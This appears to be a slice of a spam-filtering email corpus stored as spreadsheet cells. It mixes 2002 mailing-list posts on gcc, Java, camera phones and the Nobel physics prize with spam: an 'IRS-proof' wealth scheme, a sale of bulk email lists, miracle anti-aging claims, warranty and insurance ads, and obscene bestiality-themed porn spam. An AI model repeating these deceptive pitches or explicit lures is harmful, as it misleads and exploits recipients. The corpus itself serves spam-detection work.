 One is the anteroventral striatum in the middle of the
 brain right above the spinal cord. Experiments with rats
 have shown that when electrodes are placed in the striatum,
 the animals will repeatedly press a bar to stimulate the
 electrodes, apparently receiving such pleasurable feedback
 that they will starve to death rather than stop pressing
 the bar. 
 Another region activated during cooperation was the
 orbitofrontal cortex in the region right above the eyes. In
 addition to being part of the reward-processing system, Dr.
 Rilling said, it is also involved in impulse control. 
 "Every round, you're confronted with the possibility of
 getting an extra dollar by defecting," he said. "The choice
 to cooperate requires impulse control." 
 Significantly, the reward circuitry of the women was
 considerably less responsive when they knew that they were
 playing against a computer. The thought of a human bond,
 but not mere monetary gain, was the source of contentment
 on display. 
 In concert with the imaging results, the women, when asked
 afterward for summaries of how they felt during the games,
 often described feeling good when they cooperated and
 expressed positive feelings of camaraderie toward their
 playing partners. 
 Assuming that the urge to cooperate is to some extent
 innate among humans and reinforced by the brain's feel-good
 circuitry, the question of why it arose remains unclear.
 Anthropologists have speculated that it took teamwork for
 humanity's ancestors to hunt large game or gather difficult
 plant foods or rear difficult children. So the capacity to
 cooperate conferred a survival advantage on our forebears. 
 Yet as with any other trait, the willingness to abide by
 the golden rule and to be a good citizen and not cheat and
 steal from one's neighbors is not uniformly distributed. 
 "If we put some C.E.O.'s in here, I'd like to see how they
 respond," Dr. Kilts said. "Maybe they wouldn't find a
 positive social interaction rewarding at all." 
 A Prisoner's Dilemma indeed.
 http://www.nytimes.com/2002/07/23/health/psychology/23COOP.html?ex=1028415440&amp;ei=1&amp;en=2face896773fa4ea
 HOW TO ADVERTISE
 ---------------------------------
 For information on advertising in e-mail newsletters 
 or other creative advertising opportunities with The 
 New York Times on the Web, please contact
 onlinesales@nytimes.com or visit our online media 
 kit at http://www.nytimes.com/adinfo
 For general information about NYTimes.com, write to 
 help@nytimes.com.  
 Copyright 2002 The New York Times Company
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Optimizing for Pentium Pt.2
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 29 Jul 2002 05:02:23 +0100
 Paul Kelly claiming to think:
 &gt; Matthew French wrote:
 &gt; &gt;&gt;Happiness was restored to the world with gcc 2.95 and later.
 &gt; &gt; I do not have the time to follow the compiler "wars", but I notice that I
 &gt; &gt; must use egcs to build 64 bit SPARC code.
 &gt; 
 &gt; 2.95 was where the reintegration effort started and work on the other 
 &gt; projects fell away. 3.0 was the target for completion of that work.
 &gt; 
 &gt; &gt; GCC 3 should do it, but because it is so "buggy"[1] it is not worth trying
 &gt; &gt; to use unless you really want to track down those compiler errors... :(
 &gt; 
 &gt; A lot of those problems seem to have been shaken out by Redhat's ballsy 
 &gt; gcc 2.96 stunt. I've been trying out RedHat Limbo for a few weeks now, 
 &gt; equipped with gcc 3.1. I haven't fallen foul of compiler issue so far, 
 &gt; that I'm aware of anyhow. That said I'm glad I don't do much C++ - seems 
 &gt; pretty much every version of gcc (2.95, 2.96, 3.0, 3.1, and the 
 &gt; forthcoming 3.2) breaks C++ binary compatibility in some way or other.
 &gt; 
 diary.codemonkey.org.uk [Dave Jones]:
  Got a mail from Neil telling me about some whizzy new warnings in the cvs 
 version of gcc. Pulled it and spent a while playing with gcc, and after a 
 few false starts got it to spit out a bunch of warnings when compiling the 
 kernel. There's a boatload of stuff that still needs cleaning up for 2.5 
 (Things like __FUNCTION__ abuse and the like). 2.4 doesn't even compile due 
 to broken asm constraints and other such sillies. As 3.x isn't a recommended 
 compiler for 2.4, this isn't too important just yet. As more and more archs 
 start using 3.x for their standard compiler though, we should clean up some 
 of this stuff for 2.5. The new warning Neil tipped me off about 
 (-Wunused-macros) turns out far too much crap. From what I looked at, 
 it was correct in most cases, and yes there were macros being defined 
 but being unused. Cleaning them up however creates a maintenance nightmare 
 for anyone with patches in those areas already. (This sort of cleanup 
 particularly hurts people like myself who have huge patches touching large 
 parts of the tree). The recent gcc-&gt;c99 struct initialisers patch for instance 
 made large parts of my tree reject. With more to come, the fun isn't over yet either.
 that is the CVS version, but it seems that more breakage is to come with the
 kernel :(
 (Everyone will want to compile their machine on the latest greatest... I think
 they eventually persuaded Compaq's compiler to compile the kernel)...
 L.
 -- 
      dBP   dBBBBb | If you're looking at me to be an accountant
               dBP | Then you will look but you will never see
    dBP    dBBBK'  | If you're looking at me to start having babies
   dBP    dB' db   | Then you can wish because I'm not here to fool around
  dBBBBP dBBBBP'   | Belle &amp; Sebastian (Family Tree)
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 1 Sep 2002, Reza B'Far (eBuilt) wrote:
 &gt; 2.  C and C++ forces the developer to solve problems such as memory
 &gt; management over and over again.  IMHO, Java is superior because the problem
 &gt; of programming in the future is not about 0's and 1's, making the compiler
 &gt; 2% faster, or making your code take 5% less memory... It's about design
 &gt; patterns, architecture, high level stuff...
 Considering 90% of the fake job posting I see are for embedded systems or
 device drivers - C still rules the world.
 &gt; 3.  Java is not just a programming language! It's also a platform... There
 &gt; is NOTHING like the standard API's in Java in C and C++.  Everyone defines
 &gt; their own API's, people end up solving the same problems ten different ways
 The problem is the problem you're trying to solve is never the same. Java
 will soon suffer API-rot (alot of poeple are already complaining about it),
 it's just new. C was clean in the beginning too. API-rot is PURELY a
 function of age.
 &gt; 4.  If you have a program of any type of high complexity written in C, you
 &gt; can't possibly think that you could port it to different platforms within
 &gt; the same magnitude of cost as Java....
 I do this all the time, It's alot easier then you think if the original
 programmer had a clue at all... Java does remove the clue requirement tho,
 just adds a huge testing requirement, QA guys aren't as cheap ;)
 &gt; 5.  Makes no sense for a scientific or a business project to depend on a
 &gt; person... Java, IMHO, reduces the dependence of these entities on the
 &gt; individual developer as it is much easier to reverse engineer Java as it is
 &gt; to reverse engineer C (large applications).
 No it's not, but you can hire teams of Javites for cheap at your local high
 school. Java is about cutting costs and commoditizing programming - and it's
 working!
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] slashdot EW Dijkstra humor
</t>
  </si>
  <si>
    <t xml:space="preserve">kevin lyda wrote:
 &gt; speaking of things considered harmful, line lengths of over 80 chars
 &gt; are considered harmful.  cut it out.
 :-) In fairness he was using webmail
 &gt; On Thu, Aug 08, 2002 at 11:27:59AM +0100, wintermute wrote:
 &gt; 
 &gt;&gt;Interesting. I've always wondered about things 'considered' to be bad. 
 &gt;&gt;Example the GOTO, most languages support a goto of some sort, so are
 &gt;&gt;gotos really bad?
 &gt; 
 &gt; 
 &gt; if used properly, they actually can make code more readable.  but those
 &gt; proper occasions are quite rare really.  it's a good idea to avoid them
 &gt; since over use of goto will create what niall calls "write-only code."
 Yes a clever term usually (and deservedly) attributed to perl.
 Of course you can create write-only code in any language.
 There's even a competition for obfuscated C code which is always
 worth a look: http://www.es.ioccc.org/main.html
 Pdraig.
 p.s. what sort of processing do you do with:
 kevin+dated+1029235349.f17378@ie.suberic.net
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: sprint delivers the next big thing??
</t>
  </si>
  <si>
    <t xml:space="preserve">I can't see it either.
 I do however disagree with Joe in that it needs to be 2+MPixels to 
 be useful.  Value is not always necessarily defined by quality 
 (just look at 802.11).
 If I had a self-contained communications unit that let me share 
 things: documents, the weather, my new hairdo, by newborn baby, 
 etc. and it fit in my pocket then it might encourage me to share 
 those things more often.  If we're talking on the phone and you ask 
 me what the weather is like and I say "hang on", outstretch the 
 device with my arm extended, press a button, and instantly send you 
 a picture on me with blue sky in the background, that has value.
 But if I say "hang on", fumble around in my briefcase for a digital 
 camera, and  after 5 minutes of plugging and praying with USB 
 finally am able to take a photo of me, bound by several feet of 
 cable and multiple devices, well, that doesn't really have value.
 If I'm a Paparazzi I'd love to be able to send high-res photos 
 using my mobile phone because that has real economic impact, and I 
 could put up with the hassle for the amount of time it saves me.  
 However, I don't think that is the market that Sprint PCS is 
 contemplating.
 The fact that Sprint has not made the assumption that both the 
 sender and recipient of the picture are using their mobile phones 
 will help this survive. Gets around the whole "fax" problem (where 
 both sender and receiver have to have faxes in order for that 
 technology to be useful).
 On the whole, not very useful for regular Joes (pun intended).  Put 
 the camera in the phone (even a low-res one) and then it'd at least 
 be cool.
 -Ian.
 On Monday, August 19, 2002, at 05:04 AM, Joseph S. Barrera III wrote:
 &gt; Rob Shavell wrote:
 &gt;&gt; sprint, if you haven't seen the marketing yet, is 1st to US 
 &gt;&gt; market w/postwap
 &gt;&gt; mobile data svc.  to me, there is nada more interesting and 
 &gt;&gt; impactful going
 &gt;&gt; down in the tech world than mobile visual communications.. and 
 &gt;&gt; yet no one
 &gt;&gt; seems to give much of a damn that right now that 2 persons can 
 &gt;&gt; take photos
 &gt;&gt; and share them instantly across space.
 &gt;
 &gt; You're right. Or at least, I don't. I saw an advert for it on TV 
 &gt; last night (can't miss Futurama :-) and I thought, "boy, that's 
 &gt; dumb."
 &gt; If I wanted to share pictures with someone, I'd email them to them,
 &gt; where they could see them on a 1024x or 1600x display, instead of
 &gt; looking at a postage stamp on their cell phone. Or, I'd bring a 
 &gt; printout
 &gt; if they needed to see it. Etc. We all have 2+Mpixel cameras now 
 &gt; anyways,
 &gt; right? (This is one reason why I never bought the camera attachment
 &gt; for my handspring visor -- resolution was too poor.)
 &gt;
 &gt; In fact, with a 1GB microdrive in my camera, I often just keep
 &gt; old pictures around, and I can show people pictures using the
 &gt; camera's display. Which is bound to be better than the cell phone's.
 &gt;
 &gt; - Joe
 &gt; -- The Combatant State is your father and your mother, your only
 &gt; protector, the totality of your interests. No discipline can
 &gt; be stern enough for the man who denies that by word or deed.
 &gt;
 &gt;
 &gt; http://xent.com/mailman/listinfo/fork
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Undeliverable: Home Based Business for Grownups
</t>
  </si>
  <si>
    <t xml:space="preserve">This message is in MIME format. Since your mail reader does not understand
 this format, some or all of this message may not be legible.
 ------_=_NextPart_000_01C1BDF8.7FDC11CE
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Your message
   Subject: Home Based Business for Grownups
   Sent:    Sun, 21 Jan 2001 09:24:27 +0100
 did not reach the following recipient(s):
 75@tfi.kpn.com on Mon, 25 Feb 2002 13:32:23 +0100
     The recipient name is not recognized
 	The MTS-ID of the original message is: c=us;a= ;p=ptt
 telecom;l=MTPI70590202251232FJT4D8Q5
     MSEXCH:IMS:KPN-Telecom:I:MTPI7059 0 (000C05A6) Unknown Recipient
 ------_=_NextPart_000_01C1BDF8.7FDC11CE
 Content-Type: message/rfc822
 Message-ID: &lt;N1msdrbJXNPfV4wg9&gt;
 From: xl6Ety00V@fismat1.fcfm.buap.mx
 To: 
 Subject: Home Based Business for Grownups
 Date: Sun, 21 Jan 2001 09:24:27 +0100
 MIME-Version: 1.0
 X-Mailer: Internet Mail Service (5.5.2653.19)
 X-MS-Embedded-Report: 
 Content-Type: text/plain;
 	charset="iso-8859-1"
                         THIS ENTERPRISE IS AWESOMELY FEATURED 
                             IN SEPTEMBER 2000 MILLIONAIRE, 
                                AUGUST 2000 TYCOONS AND
                           AUGUST 2000 ENTREPRENEUR Magazine.
 ====&gt; Do you have a burning desire to change the quality of your existing
 life?
 ====&gt; Would you like to live the life that others only dream about?
 ====&gt; The fact is we have many people in our enterprise that earn over 50k
 per month 
       from the privacy of their own home and are retiring in 2-3 years. 
 ====&gt; Become Wealthy and having total freedom both personal and financial.
               READ ON! READ ON! READ ON! READ ON! READ ON! READ ON! READ
 ON!!!
    How would you like to:(LEGALLY &amp; LAWFULLY)
    1. KEEP MOST OF YOUR TAX DOLLARS 
    2. Drastically reduce personal, business and capital gains taxes?
    3. Protect all assets from any form of seizure, liens, or judgments?
    4. Create a six figure income every 4 months?
    5. Restoring and preserving complete personal and financial privacy?
    6. Create and amass personal wealth, multiply it and protect it?
    7. Realize a 3 to 6 times greater returns on your money?
    8. Legally make yourself and your assets completely judgment-proof,
    SEIZURE-PROOOOF, LIEN-PROOOOOOF, DIVORCE-PROOOOOOF, ATTORNEY-PROOOOOOF,
 IRS-PROOOOOOF
           ((((((((((((((((((((BECOME COMPLETELY
 INSULATED))))))))))))))))))))))))
          (((((((((((((((((((((((((HELP PEOPLE DO THE
 SAME))))))))))))))))))))))))))
 ===&gt; Are you a thinker, and a person that believes they deserve to have the
 best in life?
 ===&gt; Are you capable of recognizing a once in a lifetime opportunity when
      it's looking right at you?
 ===&gt; Countless others have missed their shot. Don't look back years later
      and wish you made the move.
 ===&gt; It's to my benefit to train you for success. 
 ===&gt; In fact, I'm so sure that I can do so,
      I'm willing to put my money where my mouth is! 
 ===&gt; Upon accepting you as a member on my team, I will provide you with
      complete Professional Training as well as FRESH inquiring LEADS to put
      you immediately on the road to success.
 If you are skeptical that's OK but don't let that stop you 
 from getting all the information you need.
      DROP THE MOUSE=====&gt;  AND CALL 800-320-9895 x2068 &lt;======= DROP THE
 MOUSE AND CALL
 ************************************800-320-9895
 x2068**************************************
 ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
 Your E-mail Address Removal/Deletion Instructions:
 We comply with proposed federal legislation regarding unsolicited
 commercial e-mail by providing you with a method for your e-mail address 
 to be permanently removed from our database and any future mailings from 
 our company.
 To remove your address, please send an e-mail message with the word REMOVE 
 in the subject line to: maillistdrop@post.com 
 If you do not type the word REMOVE in the subject line, your request to 
 be removed will not be processed. 
 ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ 
 ------_=_NextPart_000_01C1BDF8.7FDC11CE--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: $16.99 per 500,000 verified email addresses
</t>
  </si>
  <si>
    <t xml:space="preserve">We are offering you quality marketing lists which have been verified giving you a 90% delivery rate for your marketing campaign.
 The lists are downloadable along with free sending software. We are currently adding 500,000 new addresses for download each week.
 Please Call [USA] 303 889 5732 (24hr Recorded Information)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Best Life Insurance, Lowest Cost...           NTICY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</si>
  <si>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href=3D"http://insurancequotesource.com/user0202/termquotes/473400/"&gt;&lt;font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href=3D"http://insurancequotesource.com/user0202/termquotes/473400/
 "&gt;&lt;font
 face=3D"arial"
 size=3D"5"&gt;
 &lt;b&gt;GET A FREE QUOTE NOW!&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;font face=3D"arial" size=3D"2" color=3D"#000000"&gt;
 &lt;i&gt;You can't predict the future, but you can always
 prepare for it.&lt;/i&gt;&lt;/font&gt;
 &lt;/center&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;br&gt;&lt;br&gt;
 &lt;font face=3D"arial,verdana" size=3D1.5 color=3D"#8182AB"&gt;&lt;p
 align=3D"center"&gt;&lt;br&gt;&lt;br&gt;
 &lt;a
 href=3D"http://marketing-fashion.com/light/watch.asp"&gt;to be
 excluded from future contacts &lt;/a&gt;&lt;/p&gt;&lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 graham_adlam
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Rick Moen &lt;rick@linuxmafia.com&gt; a crit:
 &gt; You'll probably want to buy a retail boxed set,
 &gt; e.g., via mail order.
 &gt; The only editions of SuSE for i386 that are lawful
 &gt; to duplicate and redistribute are as follows:
 I'm confused. I thought it was GPL'ed and
 that the money you paid SuSE was for your
 60 day support or whatever? 
 I don't particularly need support, so I'm not 
 really interested in purchasing a set of disks 
 with 4 billion apps which I'll never use.
 &gt; I'm assuming in the above that you're talking about
 &gt; an i386-architecture computer. 
 Yes, thanks for your input. Anyway, I've a friend
 with 7.3 pro, so I'll just ask him.
 Paul...
 &gt; Rick Moen
 ___________________________________________________________
 Do You Yahoo!? -- Une adresse @yahoo.fr gratuite et en franais !
 Yahoo! Mail : http://fr.mail.yahoo.com
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Yoga &amp; Painfree Bliss
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.askbjoernhansen.com/archives/2002/09/26.html
 Date: 2002-09-26T16:16:43-08:00
 Last week my hands and shoulders were starting to really act up on me again. 
 The pain. I will spare you the details of my emotions when work all day with 
 pain and discomfort in what feels like my whole body. Tuesday I dragged myself 
 to yoga class at the Iyengar Yoga Institute of Los Angeles. Actually, that's 
 not quite true. Viridiana dragged me there. Look how messed up that is. I only 
 go when I'm in pain, and...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re[2]: Selling Wedded Bliss (was Re: Ouch...)
</t>
  </si>
  <si>
    <t xml:space="preserve">I dunno, BB.  Women who like to be thought of this way should have the 
 right to choose to be treated this way.  Men too...  ahem.  (:  My boy 
 cleans, washes clothes, cooks, fixes stuff, etc, and works the same number 
 of hours I do, sometimes more, if he has to catch up with me.  (:  I 
 close him because he is industrious and creative, and because he 
 unfailingly makes my bed the minute I get out of it.  And boy #2 will be 
 here soon to help boy #1 with other things such as pedicures,  backrubs, 
 and sure, fucking.  LOL! (along with the aforementioned "chores") Adam can 
 have his cake and eat it too, if he can only find the right girl who has 
 the same beliefs about gender  roles that he has. Of course, he has NO 
 clue where to look, so we will be constantly laughing at him while he 
 stumbles around in the dark.  
 Cindy
 P.S. the numbers do not in any way indicate importance or favor -- only 
 the order in which they move into my house.  -smiles at chris-
 P.S. #2.  I'm moving.   Going to New Orleans.  Can't handle any more cab 
 driving.  The summer sucked here on the MS Gulf Coast, instead of rocking 
 like it normally does.  Wish me luck.  I'm going to look for another 
 computer job.  Le Sigh.  (:  
 On Thu, 5 Sep 2002 bitbitch@magnesium.net wrote:
 &gt; Hello Adam,
 &gt; 
 &gt; Thursday, September 05, 2002, 11:33:18 PM, you wrote:
 &gt; 
 &gt; 
 &gt; ALB&gt; So, you're saying that product bundling works? Good point.
 &gt; 
 &gt; Sometimes I wish I was still in CA.  You deserve a good beating every
 &gt; so often...  (anyone else want to do the honors?)
 &gt; 
 &gt; ALB&gt; And how is this any different from "normal" marriage exactly? Other then
 &gt; ALB&gt; that the woman not only gets a man, but one in a country where both she and
 &gt; ALB&gt; her offspring will have actual opportunities? Oh and the lack of
 &gt; ALB&gt; "de-feminized, over-sized, self-centered, mercenary-minded" choices?
 &gt; 
 &gt; Mmkay.  For the nth time Adam, we don't live in the land of
 &gt; Adam-fantasy.  Women actually are allowed to do things productive,
 &gt; independent and entirely free of their male counterparts.  They aren't
 &gt; forced to cook and clean and merely be sexual vessels.   Sometimes,
 &gt; and this will come as a shock to you, no doubt, men and women even
 &gt; find -love- (which is the crucial distinction between this system) and
 &gt; they marry one another for the satisfaction of being together.   I
 &gt; know, far-fetched and idealistically crazy as it is, but such things
 &gt; do happen.   I can guarantee you, if my mother was approached by my
 &gt; father, and 25 years ago, he commented on her cleaning ability as a
 &gt; motivator for marrying her, we would not be having this conversation
 &gt; now.
 &gt; 
 &gt; If guys still have silly antequated ideas about 'women's role' then
 &gt; their opportunities for finding women _will_ be scarce.   Again, these
 &gt; situations are great, provided everyone is aware that the relationship
 &gt; is a contractual one -- he wants a maid, a dog and a prostitute he
 &gt; doesn't have to pay, and she wants a country that isn't impoverished
 &gt; and teeming with AIDS.  A contract, versus a true love-interest
 &gt; marriage.
 &gt; 
 &gt; Egh.  I really need to stop analyzing your posts to this extent.   I
 &gt; blame law school and my cat.
 &gt; 
 &gt; -BB
 &gt; 
 &gt; ALB&gt; - Adam L. "Duncan" Beberg
 &gt; ALB&gt;   http://www.mithral.com/~beberg/
 &gt; ALB&gt;   beberg@mithral.com
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 -- 
 "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] Razor with sendmail
</t>
  </si>
  <si>
    <t xml:space="preserve">"Bort, Paul" &lt;pbort@tmwsystems.com&gt; wrote:
 &gt;If your sendmail has been compiled with Milter support, you can add SMRazor
 &gt;easily. We've been using it for a while without problems. Others on the list
 &gt;have mentioned it as well.
 &gt;
 &gt;http://www.sapros.com/smrazor/
 Is there an easy way to tell if Milter is compiled in?
 -- 
 Julian Bond Email&amp;MSM: julian.bond@voidstar.com
 Webmaster:              http://www.ecademy.com/
 Personal WebLog:       http://www.voidstar.com/
 CV/Resume:          http://www.voidstar.com/cv/
 M: +44 (0)77 5907 2173   T: +44 (0)192 0412 433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</si>
  <si>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ADV: Extended Auto Warranty -- even older cars... xwczh
</t>
  </si>
  <si>
    <t xml:space="preserve">Protect yourself with an extended warranty for your car, minivan, truck or SUV. Rates can be as much as 60% cheaper than at the dealer!
 Extend your existing Warranty.
 Get a new Warranty even if your original Warranty expired.
 Get a FREE NO OBLIGATION Extended Warranty Quote NOW. Find out how much it would cost to Protect YOUR investment. 
 This is a FREE Service.
 Simply fill out our FREE NO OBLIGATION form and 
 find out.
 It's That Easy!
 Visit our website:  
  http://211.78.96.242/auto/warranty.htm
 ================================================
 To be removed, click below and fill out the remove form:
 http://211.78.96.242/removal/remove.htm
 Please allow 72 hours for removal.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Nobel astrophysicists
</t>
  </si>
  <si>
    <t xml:space="preserve">Nobel Honors 3 for Astrophysics Work 
 Tuesday October 8, 2002 12:00 PM
 STOCKHOLM, Sweden (AP) - Two Americans and a Japanese won the Nobel Prize in
 physics Tuesday for using some of the most obscure particles and waves in
 nature to understand the workings of astronomy's grandest wonders.
 Riccardo Giacconi, 71, of the Associated Universities Inc. in Washington,
 D.C., will get half of the $1 million prize for his role in ``pioneering
 contributions to astrophysics, which have led to the discovery of cosmic
 X-ray sources.''
 Raymond Davis, Jr., 87, of the University of Pennsylvania shares the other
 half of the prize with Japanese scientist Masatoshi Koshiba, 76, of the
 University of Tokyo. The two men pioneered the construction of giant
 underground chambers to detect neutrinos, elusive particles that stream from
 the sun by the billion.
 Neutrinos offer an unparalleled view of the sun's inner workings because
 they are produced in its heart by the same process that causes it to shine.
 In fact, Davis' early experiments, performed during the 1960s in a South
 Dakota gold mine, confirmed that the sun is powered by nuclear fusion.
 Koshiba won his share of the prize for his work at the Kamiokande neutrino
 detector in Japan. That experiment confirmed and extended Davis' work, and
 also discovered neutrinos coming from distant supernova explosions, some of
 the brightest objects in the universe.
 The Italian-born Giacconi, a U.S. citizen, was awarded half of the prize for
 building the first X-ray telescopes that provided ``completely new - and
 sharp - images of the universe,'' the academy said.
 His research laid the foundation for X-ray astronomy, which has led to the
 discovery of black holes and allowed researchers to peer deep into the
 hearts of the dusty young galaxies where stars are born.
 When academy officials reached Giacconi by phone at his home outside
 Washington, he said he was ``dumbstruck'' to learn of the prize. Koshiba
 also was phoned at home in Tokyo, but the academy was still trying to reach
 Davis, spokesman Erling Norrby said.
 This year's Nobel awards started Monday with the naming of Britons Sydney
 Brenner, 75, and Sir John E. Sulston, 60, and American H. Robert Horvitz,
 55, as winners of the medicine prize, selected by a committee at the
 Karolinska Institute.
 The researchers shared it for discoveries about how genes regulate organ
 growth and a process of programmed cell deaths that shed light on how
 viruses and bacteria invade human cells, including in conditions such as
 AIDS, strokes, cancer and heart attacks.
 The winner of the Nobel Prize in chemistry will be named on Wednesday
 morning and the Bank of Sweden Prize in Economic Sciences in Memory of
 Alfred Nobel later the same day.
 The literature prize winner will be announced on Thursday, the Swedish
 Academy said on Tuesday.
 The winner of the coveted peace prize - the only one not awarded in Sweden -
 will be announced Friday in Oslo, Norway.
 The award committees make their decisions in deep secrecy and candidates are
 not publicly revealed for 50 years.
 Alfred Nobel, the wealthy Swedish industrialist and inventor of dynamite who
 endowed the prizes left only vague guidelines for the selection committees.
 In his will he said the prize being revealed on Tuesday should be given to
 those who ``shall have conferred the greatest benefit on mankind'' and
 ``shall have made the most important discovery or invention within the field
 of physics.''
 The Royal Swedish Academy of Sciences, which also chooses the chemistry and
 economics winners, invited nominations from previous recipients and experts
 in the fields before cutting down its choices. Deliberations are conducted
 in strict secrecy.
 The prizes are presented on Dec. 10, the anniversary of Nobel's death in
 1896, in Stockholm and in Oslo.
 ---
 On the Net:
 Nobel site, http://www.nobel.se 
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Plan to Sell a Home?
 http://us.click.yahoo.com/J2SnNA/y.lEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Space probe kit will fight terrestrial crime
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8553539,1440/
 Date: Not supplied
 A detector from an asteroid-chasing NASA probe will soon be helping detectives 
 to solve gun crimes and murder cases
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Start now look great this spring
</t>
  </si>
  <si>
    <t xml:space="preserve">As seen on NBC, CBS, CNN, and even Oprah! The health 
 discovery that actually reverses aging while burning fat, 
 without dieting or exercise! This proven discovery has even 
 been reported on by the New England Journal of Medicine. 
 Forget  aging and dieting forever! And it's Guaranteed!   
 Click here:
 http://66.231.133.70/sj1/index.html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
 You are receiving this email as a subscriber
 to the Opt-In America Mailing List. 
 To unsubscribe from future offers,
 just click here:
 mailto:affiliateoptout@btamail.net.cn?Subject=off
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: It will work for you
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAdev] Spam-Assassin nightly build 22-8-02
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello all,
 I get problems with the latest nightly build from Spamassassin with
 VMailMgr + OMail-Admin. 
 It scans the mail and gives it an :
         X-Spam-Status: No, hits=11.4 required=7.0
 Can someone look at the code for it? Maybe because option -F is gone?
 Greetings
 Erik Rudolfs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</si>
  <si>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[Spambayes] timtest broke?
</t>
  </si>
  <si>
    <t xml:space="preserve">[Skip Montanaro]
 &gt; After my latest cvs up, timtest fails with
 &gt;
 &gt;     Traceback (most recent call last):
 &gt;       File "/home/skip/src/spambayes/timtest.py", line 294, in ?
 &gt;         drive(nsets)
 &gt;       File "/home/skip/src/spambayes/timtest.py", line 264, in drive
 &gt;         d = Driver()
 &gt;       File "/home/skip/src/spambayes/timtest.py", line 152, in __init__
 &gt;         self.global_ham_hist = Hist(options.nbuckets)
 &gt;     AttributeError: 'OptionsClass' object has no attribute 'nbuckets'
 &gt;
 &gt; I'm running it as
 &gt;
 &gt;     timtest -n5 &gt; Data/timtest.out
 &gt;
 &gt; from my ~/Mail directory (not from my ~/src/spambayes directory).  If I
 &gt; create a symlink to ~/src/spambayes/bayes.ini it works once again, but
 &gt; shouldn't there be an nbuckets attribute with a default value already?
 I never used ConfigParser before, but I read that its read() method silently
 ignores files that don't exist.  If 'bayes.ini' isn't found, *none* of the
 options will be defined.  Since you want to run this from a directory other
 than my spambayes directory, it's up to you to check in changes to make that
 possible &lt;wink&gt;.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Sometimes, not always, I like the idea of a chick... with a horse... 
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;BODY bgcolor="#FFFFFF" marginwidth="0" marginheight="0" topmargin="3" leftmargin="0" rightmargin="0" vlink="blue" alink="blue" text="#FF0000" link="#FF0000"&gt;
 &lt;DIV ALIGN="center"&gt; 
 &lt;p&gt;&lt;FONT FACE="arial" SIZE="7"" COLOR="#FF0000"&gt;FREEKY FUCKING SHIT!&lt;/FONT&gt;&lt;/p&gt;
 &lt;font size="7"" color="red" face="arial"&gt; 
 &lt;TABLE ALIGN="center" CELLSPACING="5" CELLPADDING="5" BORDER="0" WIDTH="500"&gt; 
 	&lt;TR&gt; 
 		&lt;TD ALIGN="center" colspan="4"&gt; 
 			&lt;p&gt;&lt;font color="#0000FF"&gt;&lt;A HREF="http://80.71.70.144/re.php?cid=21&amp;eid=am1AbmV0bm90ZWluYy5jb20=&amp;url=80.71.70.144/wfs/?aid=919777"&gt;&lt;B&gt;This is the CRAZIEST this that i have ever seen!!&lt;/B&gt;&lt;/A&gt;&lt;/font&gt;&lt;/p&gt;
 			&lt;p&gt;&lt;B&gt;&lt;A HREF="http://80.71.70.144/re.php?cid=21&amp;eid=am1AbmV0bm90ZWluYy5jb20=&amp;url=80.71.70.144/wfs/?aid=919777"&gt;&lt;FONT COLOR="#0000FF"&gt;You will not believe your eyes.. and best of all it is &lt;/FONT&gt;&lt;/A&gt;&lt;/B&gt;&lt;/p&gt;
 			&lt;p&gt;&lt;B&gt;&lt;A HREF="http://80.71.70.144/re.php?cid=21&amp;eid=am1AbmV0bm90ZWluYy5jb20=&amp;url=80.71.70.144/wfs/?aid=919777"&gt;&lt;FONT COLOR="#FF0000" SIZE="5"&gt;FREE TO JOIN FOREVER!!&lt;/FONT&gt;&lt;/A&gt;&lt;/B&gt;&lt;/p&gt;
